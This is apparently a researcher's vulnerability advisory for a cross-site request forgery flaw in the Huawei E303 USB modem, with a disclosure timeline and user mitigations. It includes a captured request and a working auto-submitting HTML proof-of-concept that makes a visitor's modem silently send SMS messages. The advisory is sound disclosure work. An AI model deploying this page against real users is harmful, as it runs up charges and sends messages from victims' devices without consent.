Benjamin Daniel Mussler

Ix-Xgħajra, Malta
Karlsruhe, Germany

Technical notes, thoughts and vulnerability advisories sprinkled with the occasional proof-of-concept.

Twitter LinkedIn HackerOne Bugcrowd
WEB@FL7.DE
PGP (0xE0DEFE1F)

Table of Contents

  1. Summary
  2. Technical Details
  3. Additional Notes
  4. Recommendations for End Users
  5. German Summary / Deutsche Zusammenfassung
  6. Timeline
  7. See Also

1. Summary

The Huawei E303 http://consumer.huawei.com/en/mobile-broadband/data-card/tech-specs/e303-en.htm is a 2G/3G USB Modem.

A specially crafted HTML web page will cause a visitor’s E303 device to silently send one or more SMS (text) messages. The device will neither ask for permission nor offer any means to cancel the operation in order to avoid the costs incurred by sending these SMS messages. The recipient of the SMS messages, as well as their content, can be specified by the attacker.

2. Technical Details

The device’s web interface (Web UI) is vulnerable to Cross Site Request Forgery (CSRF). The vulnerable module is located at “/api/sms/send-sms”; e.g. http://192.168.1.1/api/sms/send-sms or http://hi.link/api/sms/send-sms.

The Web UI communicates with the vulnerable module by sending and receiving XML requests and responses via XmlHttpRequest. However, the vulnerable module can also be accessed and controlled by sending an HTTP-POST request with XML in the request’s body (see [2.1] for a capture of the HTTP request/response traffic). The vulnerable module will process this XML as if it had originated from the Web UI.

The attached PoC [2.2] has been tested and confirmed with Mozilla Firefox 25, Microsoft Internet Explorer 11 and Google Chrome 31 and the following device/software versions, which are current at the time of writing:

Device name:    E303 / E303s-2
Software version:       22.157.18.00.858
Hardware version:       CH2E303SM
Web UI version:         11.010.06.01.858

2.1. HTTP request/response

POST /api/sms/send-sms HTTP/1.1
Host: hi.link
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.8,de-de;q=0.5,de;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://hi.link/
Connection: keep-alive
Content-Type: text/plain
Content-Length: 225

<?xml version="1.0" encoding="UTF-8"?><request><Index>-1</Index><Phones><Phone>4422</Phone></Phones><Sca></Sca><Content>Sample Text</Content><Length>0</Length><Reserved>1</Reserved><Date>2013-12-03 16:00:00</Date></request>




HTTP/1.1 200 OK
Date: Thu, 01 Jan 1970 04:09:18 GMT
Server: IPWEBS/1.4.0
Cache-Control: no-cache
Content-Length: 65
Content-Type: text/html

<?xml version="1.0" encoding="UTF-8"?>
<response>OK</response> 

2.2. Proof of Concept

    <html><head></head>
    <body onload=document.forms[0].submit();>

    <form action="http://hi.link/api/sms/send-sms" method="POST" enctype="text/plain">
    <textarea name="&lt;?xml version=&quot;1.0&quot; encoding" rows="10" cols="150">&quot;UTF-8&quot;?&gt;&lt;request&gt;&lt;Index&gt;-1&lt;/Index&gt;&lt;Phones&gt;&lt;Phone&gt;4422&lt;/Phone&gt;&lt;/Phones&gt;&lt;Sca&gt;&lt;/Sca&gt;&lt;Content&gt;Sample Text&lt;/Content&gt;&lt;Length&gt;0&lt;/Length&gt;&lt;Reserved&gt;1&lt;/Reserved&gt;&lt;Date&gt;2013-12-03 16:00:00&lt;/Date&gt;&lt;/request&gt;</textarea><br>
    <input type="submit" value="Send" name="" style="width: 200px; height: 50px">
    </form>

    </body>
    </html>

3. Additional Notes

I do not believe this vulnerability (VU#325636) to be a duplicate of VU#341526 http://www.kb.cert.org/vuls/id/341526.

While both devices suffer from a direct request vulnerability, the main differences between VU#341526 and VU#325636 are:

a) Access requirements: According to http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6031, VU#341526’s access vector is “Local network exploitable” whereas the vulnerability reported by me is not only exploitable from a local network but from the internet as well. For example, the PoC code I have sent to Huawei and CERT can simply be embedded in a web page on the internet; previous access to the victim’s local network is not required. It seems to me that in order to exploit VU#341526, an attacker has to be connected to the WLAN/WiFi network created by the device, which is not required for VU#325636.

b) Impact: According to http://www.kb.cert.org/vuls/id/341526, an attacker can “gather [and change] sensitive configuration information”, whereas the vulnerability reported by me allows an attacker to remotely control the device to the point of using its SMS functionality which is not mentioned in VU#341526’s description. Its PoC Metasploit module does not refer to or access the vulnerable “/api/sms/send-sms” module either.

To summarize; both VU#341526 and VU#325636 describe the same type of vulnerability (CWE-425 / direct request vulnerability), although the vulnerability reported by me adds a CSRF vulnerability. However, VU#325636 targets not only a different device and a different software but is also both easier to exploit and, in my opinion, easier to monetize.

4. Recommendations for End Users

It is Huawei’s responsibility to protect its customers against this vulnerability. With that being said, users of the Huawei E303 modem may want to take action to protect themselves against becoming victims of attacks targeting this vulnerability.

In order to minimize the direct financial impact of a successful attack, it is suggested to use the E303 only in connection with a pre-paid plan and a balance as low as practical.

Some web browsers offer security functionality which may be employed to strengthen defenses against attacks similar to the one described above (2.2. Proof of Concept).

4.1. Opera

Opera’s default settings prevent this vulnerability from being exploited. “http://hi.link” and “http://[Device IP]” (e.g. “http://192.168.1.1”) should not be listed as “Trusted Websites” (Menu -> Settings -> Preferences -> Advanced -> Network -> Trusted Websites)

4.2. Mozilla Firefox

The NoScript extension https://addons.mozilla.org/en-US/firefox/addon/noscript/ with its Application Boundaries Enforcer (ABE) http://noscript.net/abe/ functionality will prevent this and similar attacks.

4.3. Internet Explorer

End users can add “http://hi.link” and “http://[Device IP]” (e.g. “http://192.168.1.1”) to Internet Explorer’s list of “Restricted Sites” (Tools -> Internet Options -> Security -> Restricted Sites). Subsequently, Internet Explorer will display a warning when a web page tries to access the E303’s Web UI (“When you send information to the Restricted area, it might be possible for others to see that information. Do you want to continue?”). It is still the end user’s responsibility to read and understand this warning message and, of course, to choose “No” despite “Yes” being pre-selected.

4.4. Google Chrome

I am not aware of settings/extensions comparable to the ones mentioned above.

4.5. Safari

I am not aware of settings/extensions comparable to the ones mentioned above.

5. German Summary / Deutsche Zusammenfassung

Die Administrationsoberflaeche des UMTS-USB-Sticks E303 von Huawei ermoeglicht einem Angreifer den fuer das Opfer unsichtbaren Versand kostenpflichtiger SMS-Nachrichten. Dazu ist es ausreichend, dass das Opfer eine entsprechend praeparierte Webseite besucht.

Der Huawei E303 ist derzeit der in seiner Amazon.de-Bestseller-Liste am besten positionierte UMTS-USB-Stick (http://www.amazon.de/gp/bestsellers/computers/430148031/) und duerfte in Deutschland entsprechend weit verbreitet sein.

In deutscher Sprache wird der Sachverhalt unter anderem auf golem.de (http://www.golem.de/news/huawei-sms-verschicken-auf-fremde-kosten-1406-106873.html), netzwoche.ch (http://www.netzwoche.ch/de-CH/News/2014/06/04/Moegliche-Sicherheitsluecke-bei-Huawei-Surfstick-E303.aspx) und heise.de (http://www.heise.de/security/meldung/UMTS-Stick-mit-SMS-Falle-2214265.html) beschrieben.

6. Timeline

2013-12-03 Vulnerability discovered.
2013-12-03 Vulnerability reported to Huawei PSIRT, following the procedure outlined at http://www.huawei.com/en/security/psirt/report-vulnerabilities/index.htm.
2014-03-08 (Three months later, still no response from Huawei PSIRT.)
2014-03-09 Vulnerability reported to CERT/CC.
2014-03-10 CERT Coordination Center Tracking ID VU#325636 assigned.
2014-05-09 CERT/CC assigns CVE-ID CVE-2014-2946.
2014-05-21 Huawei requests additional information; announces preparation of fix.
2014-05-30 Public disclosure.

7. See Also